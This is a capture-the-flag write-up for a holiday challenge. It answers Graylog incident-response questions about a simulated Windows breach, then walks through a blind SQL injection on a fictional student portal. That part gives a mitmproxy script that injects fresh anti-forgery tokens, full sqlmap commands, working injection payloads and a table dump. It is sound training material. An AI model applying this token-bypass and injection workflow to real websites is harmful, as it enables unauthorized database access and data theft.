Paper Scraps Hunting

Graylog to the rescue

After solving the CAPTEHA and winning a lifetime supply of cookiez for Krampus, he provided you with some further clues. He first pointed you to some paper scraps he found in the vents, which he collected by using the Turtle Doves… Then he mentions that he stored some scanned copies of the paper scraps on his server at: studentportal.elfu.org. However, he forgot his access credentials, so he asked you to hack your way in and retrieve those images:

Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

If you need them, you can get further hints by visiting Pepper Minstix in the dormitory. Luckily you don’t need to walk anymore, as Krampus updated your badge with new firmware that lets you teleport within the Elf University campus… How cool is that!

Once you talk with Minstix, he says he will help you out, but only after you help him with an issue he is facing:

Pepper Minstix in DORM

It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.

To solve this technical challenge, you need to get familiar with Graylog. You can do this either via the in-game terminal or by browsing to graylog.elfu.org in a new tab. In order to submit your answers though, you need to open the terminal and hover over the bottom right corner for the input forms to appear (also available at this link). For the information gathering it may be easier to navigate to the service in a separate browser tab.

To get the hints, you will need to answer these 10 questions below:

Q1 - What is the path and filename of the first malicious file downloaded by Minty?

This can be easily found by searching for the username minty, enabling the TargetFileName column and browsing through the log entries later in time (towards the end of all logs available). This will eventually lead you to the following answer: C:\Users\minty\Downloads\cookie_recipe.exe.

Q2 - What was the ip:port the malicious file connected to first?

Within the same search results, enable the columns DestinationIpAddress and DestinationPort and look for values that seem anomalous. I found the IP 192.168.247.175 and ports 4443 and 4444 that seemed out of the ordinary, so I tried them, and the combination 192.168.247.175:4444 was accepted as the correct answer.

Q3 - What was the first command executed by the attacker?

If you examine the log entry right after the one which was providing the IP and port for the previous answer, you will see this CommandLine property: C:\Windows\system32\cmd.exe /c “whoami “. It seems awfully suspicious, and indeed it holds the correct answer: whoami.

Q4 - What is the one-word service name the attacker used to escalate privileges?

So to answer this I first had to Google how services can be started on Windows systems, and found that it is usually done by calling a command that starts like sc start …, so I searched the Graylog server for this string and found a lot of entries involving the webexservice, which was the correct answer.

Q5 - What is the path & filename of the binary ran by the attacker to dump credentials?

For this question you should search for the text exe and within the results look for the string password. You should find a suspiciously named .exe called by someone, which holds the correct answer: C:\cookie.exe.

Q6 - Which account name was used to pivot to another machine?

To answer this, you should notice that not all log entries have an AccountName value, so you should search for exists: AccountName, which returns only the log entries where this value exists. In the results you will find minty quite often, but this would not be accepted, so try some others from the results; perhaps alabaster will work… :)

Q7 - What is the time (HH:MM:SS) the attacker makes a Remote Desktop connection to another machine?

For this I had to learn that in a Windows environment the act of opening a remote connection via RDP causes an event to be generated with ID 4624 and LogonType 10, so I searched for these values in Graylog with EventID: 4624 AND LogonType:10 and found the correct timestamp to be: 06:04:28.

Q8 - What is the ‘SourceHostName,DestinationHostname,LogonType’ of this connection?

To answer this question, you should look for LogonType 3 and the existence of source and destination hostnames. I made the following search query: LogonType: 3 AND exists:SourceHostName AND exists:DestinationHostname, which gave the following solution: ELFU-RES-WKS2,elfu-res-wks3,3 (after several rounds of trial and error based on the search results).

Q9 - What is the path & filename of the secret document being transferred from the third host to the second host?

First you should look for the account alabaster, because the attacker was disguised under this account; then look through the results for a PDF file that seems suspicious. The correct answer will be: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf.

Q10 - What is the IPv4 address the secret research document was exfiltrated to?

To answer this, I listed all log entries, went to the very end and turned on the CommandLine and TargetIpAddress columns, in order to see that a PowerShell command was used to upload this secret PDF to some website. This revealed the target IP address: 104.22.3.84.
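As an added example (not part of the original write-up), the searches used for Q6, Q7 and Q8 above can be expressed as filters over Graylog-style event records. The records below are constructed for illustration, and the field names follow the write-up's queries (EventID, LogonType, SourceHostName, DestinationHostname):

```python
from typing import Dict, List, Optional

# Constructed sample of Graylog-style logon events (not real ELFU data); field
# names follow the write-up's searches (EventID, LogonType, SourceHostName, ...).
EVENTS: List[Dict[str, object]] = [
    {"timestamp": "2019-11-19T05:58:01", "EventID": 4624, "LogonType": 2,
     "AccountName": "minty", "SourceHostName": "elfu-res-wks1"},
    {"timestamp": "2019-11-19T06:04:28", "EventID": 4624, "LogonType": 10,
     "AccountName": "alabaster", "SourceHostName": "elfu-res-wks1",
     "DestinationHostname": "elfu-res-wks2"},
    {"timestamp": "2019-11-19T06:05:10", "EventID": 4624, "LogonType": 3,
     "AccountName": "alabaster", "SourceHostName": "ELFU-RES-WKS2",
     "DestinationHostname": "elfu-res-wks3"},
    {"timestamp": "2019-11-19T06:05:12", "EventID": 4624, "LogonType": 3,
     "AccountName": "svc", "SourceHostName": "ELFU-RES-WKS2"},  # no destination
    {"timestamp": "2019-11-19T06:07:45", "EventID": 4634, "LogonType": 10,
     "AccountName": "alabaster"},  # logoff: wrong EventID, must not match Q7
]

def exists(event: Dict[str, object], field: str) -> bool:
    """Graylog 'exists:<field>' semantics: the field is present and non-empty."""
    return field in event and event[field] not in (None, "")

def rdp_logons(events):
    """'EventID: 4624 AND LogonType:10' -- successful RemoteInteractive (RDP) logons."""
    return [e for e in events if e.get("EventID") == 4624 and e.get("LogonType") == 10]

def network_logons_with_hosts(events):
    """'LogonType: 3 AND exists:SourceHostName AND exists:DestinationHostname'."""
    return [e for e in events
            if e.get("LogonType") == 3
            and exists(e, "SourceHostName") and exists(e, "DestinationHostname")]

def first_rdp_time(events) -> Optional[str]:
    """HH:MM:SS of the earliest RDP logon, the form Q7 asks for."""
    hits = sorted(rdp_logons(events), key=lambda e: str(e["timestamp"]))
    return str(hits[0]["timestamp"]).split("T")[1] if hits else None

def pivot_summaries(events) -> List[str]:
    """'SourceHostName,DestinationHostname,LogonType' strings, the form Q8 asks for."""
    return [f'{e["SourceHostName"]},{e["DestinationHostname"]},{e["LogonType"]}'
            for e in network_logons_with_hosts(events)]

if __name__ == "__main__":
    print("Q7:", first_rdp_time(EVENTS))
    print("Q8:", pivot_summaries(EVENTS))
```

The same filters can be pointed at a JSON export of a real Graylog search to double-check answers found by clicking through columns.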

So now the questions are answered and Pepper is ready to share some useful hints:

That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going!

Main objective

So Pepper Minstix hinted at the tool called sqlmap, which can help us exploit vulnerable databases tied to web applications that accept input from users. This is quite a valuable hint. Further information in the hint includes:

Student portal

The given target (studentportal.elfu.org) has several endpoints, which could be targeted with a Web App exploit:

  • studentportal.elfu.org/index.php
  • studentportal.elfu.org/students.php
  • studentportal.elfu.org/apply.php
  • studentportal.elfu.org/check.php

The first and the second do not accept any input, so they are not going to be very useful for this objective; however, apply.php and check.php do accept user input through HTML forms. Of these two, I first decided to take a look at the latter, as it only has one input field, which can be enough for the purpose. Do note that the HTML form in the check.php endpoint has a different target specified, application-check.php, so the sqlmap attack should be directed at this URL instead of check.php.

<form id="check" action="/application-check.php" method="get" onsubmit="submitApplication()">
    <h1>Check Application Status</h1>
    <div>
        <label for="inputEmail">Elf Mail Address</label>
        <input name="elfmail" type="email" id="inputEmail" placeholder="Email address" required="" autofocus="">
    </div>
    <input type="hidden" id="token" name="token" value="">
    <div>
        <input type="submit" value="Check Status">
    </div>
</form>

In the HTML source code, notice that the submission form also has a hidden field called token, which also gets sent along with the request when the button is clicked. Searching a bit further in the page source you can see a short JavaScript snippet which handles the update of this input field and the actual form submission:

function submitApplication() {
    console.log("Submitting");
    elfSign();
    document.getElementById("check").submit();
}
function elfSign() {
    var s = document.getElementById("token");
    const Http = new XMLHttpRequest();
    const url = '/validator.php';
    // synchronous request, so the token is in place before the form is submitted
    Http.open("GET", url, false);
    Http.send(null);
    if (Http.status === 200) {
        console.log(Http.responseText);
        s.value = Http.responseText;
    }
}

So now you know that when you call sqlmap and attack elfmail, you also need to set up some kind of script that automatically fetches the token and inserts it into the requests, as they will be rejected otherwise. My first idea was to write a tamper script for sqlmap, which defines a custom transformation that inserts the token into the payload of each request. However, for some reason I could not get this tamper script to work; I always received an Invalid or expired token error for every request generated by sqlmap.

So next, I looked around on the net for an alternative solution, and found the mitmproxy tool, which has a nice Python API that helped with the token injection. The GitHub repo for the mitmproxy project has several useful examples, which helped me learn enough of the API to get going with the token-injecting service. The script I used was very simple and easy to understand:

from mitmproxy import http
import requests

def request(flow: http.HTTPFlow) -> None:
    # obtain the token from the validator.php endpoint
    r = requests.get("https://studentportal.elfu.org/validator.php")
    # insert the token into the request that is intercepted by mitmproxy
    flow.request.query["token"] = r.content.decode("utf-8")

Below is a sample screenshot of the mitmproxy console showing a request that has already been injected with the necessary token:

Student portal

Now that the proxy is set up (IP: 192.168.56.7, PORT: 8080), it was time to let sqlmap loose on the database and find some vulnerabilities. To start the scan you need to run the following command, specifying the URL and the query parameter you want to exploit (-p elfmail in this case):

~/sqlmap ▶ python sqlmap.py --proxy='http://192.168.56.7:8080' --url="https://studentportal.elfu.org/application-check.php?elfmail=email@example.com" -p elfmail -risk 3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.12.34#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[*] starting @ 10:40:06 /2020-01-01/

[10:40:06] [INFO] testing connection to the target URL
[10:40:09] [INFO] target URL content is stable
[10:40:10] [INFO] heuristic (basic) test shows that GET parameter 'elfmail' might be injectable (possible DBMS: 'MySQL')
[10:40:11] [INFO] heuristic (XSS) test shows that GET parameter 'elfmail' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:11] [INFO] testing for SQL injection on GET parameter 'elfmail'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n]
[10:40:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:40:31] [INFO] GET parameter 'elfmail' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your application is still pending!")
[...REDACTED FOR BREVITY...]
[10:46:19] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'elfmail' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 279 HTTP(s) requests:
---
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: elfmail=asd' AND 7313=7313 AND 'PMOS'='PMOS

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: elfmail=asd' AND (SELECT 1941 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(1941=1941,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'EUey'='EUey

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: elfmail=asd' AND (SELECT 1748 FROM (SELECT(SLEEP(5)))MzkM) AND 'qFnu'='qFnu
---
[10:59:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.1, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0

Now you can see that sqlmap, in cooperation with mitmproxy, successfully identified the DB type and found three injection techniques that work against the elfmail input field:

  • boolean-based blind
  • error-based
  • time-based blind
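As an added example (not from the write-up or the portal's own code), the following snippet shows why the elfmail field is boolean-based blind injectable, using an in-memory SQLite stand-in for the portal's MySQL database: a string-concatenated query beside its parameterized replacement, both exercised with the boolean payload sqlmap reported above. The table, its single row and the response strings are constructed.

```python
import sqlite3

PENDING = "Your application is still pending!"   # the --string sqlmap keyed on
NOT_FOUND = "No application found."              # constructed "false" response

def _db() -> sqlite3.Connection:
    """In-memory stand-in for the portal database; table and row are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE applications (elfmail TEXT, status TEXT)")
    con.execute("INSERT INTO applications VALUES ('asd', 'pending')")
    return con

def check_status_vulnerable(elfmail: str) -> str:
    """String-concatenated query: quotes in the input change the SQL itself."""
    con = _db()
    sql = f"SELECT status FROM applications WHERE elfmail='{elfmail}'"
    row = con.execute(sql).fetchone()
    return PENDING if row else NOT_FOUND

def check_status_fixed(elfmail: str) -> str:
    """Parameterized query: the whole input is compared as one literal value."""
    con = _db()
    row = con.execute("SELECT status FROM applications WHERE elfmail=?",
                      (elfmail,)).fetchone()
    return PENDING if row else NOT_FOUND

# The boolean-based payload sqlmap reported above, and its false-condition twin.
TRUE_PAYLOAD = "asd' AND 7313=7313 AND 'PMOS'='PMOS"
FALSE_PAYLOAD = "asd' AND 7313=7314 AND 'PMOS'='PMOS"

def acts_as_oracle(check) -> bool:
    """True if the endpoint answers differently for true vs. false injected conditions,
    which is exactly the behaviour sqlmap's boolean-based blind test looks for."""
    return check(TRUE_PAYLOAD) != check(FALSE_PAYLOAD)

if __name__ == "__main__":
    print("vulnerable acts as oracle:", acts_as_oracle(check_status_vulnerable))
    print("fixed acts as oracle:     ", acts_as_oracle(check_status_fixed))
```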

Next you can use sqlmap to explore the database further. Passing the flag --dbs to the same command as before will list all databases, while the flag --tables will list all the tables within a chosen database. Once you have found the correct combination of flags, you can use the flag --dump to dump the table’s content. In this case these flags worked to find the paper scraps:

~/sqlmap ▶ python3 sqlmap.py --proxy=[...] --url=[...] -p elfmail -D elfu -T krampus --dump

database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path                  |
+----+-----------------------+
| 1  | /krampus/0f5f510e.png |
| 2  | /krampus/1cc7e121.png |
| 3  | /krampus/439f15e6.png |
| 4  | /krampus/667d6896.png |
| 5  | /krampus/adb798ca.png |
| 6  | /krampus/ba417715.png |
+----+-----------------------+

Prepending the file names from the exfiltrated table with the site’s URL will finally reveal the paper scraps. Once you download and reassemble all of them, you can read the full text of the letter and answer the objective.

wget https://studentportal.elfu.org/krampus/0f5f510e.png
wget https://studentportal.elfu.org/krampus/1cc7e121.png
wget https://studentportal.elfu.org/krampus/439f15e6.png
wget https://studentportal.elfu.org/krampus/667d6896.png
wget https://studentportal.elfu.org/krampus/adb798ca.png
wget https://studentportal.elfu.org/krampus/ba417715.png

What is the name of Santa’s cutting-edge sleigh guidance system?:

Super Sled-o-matic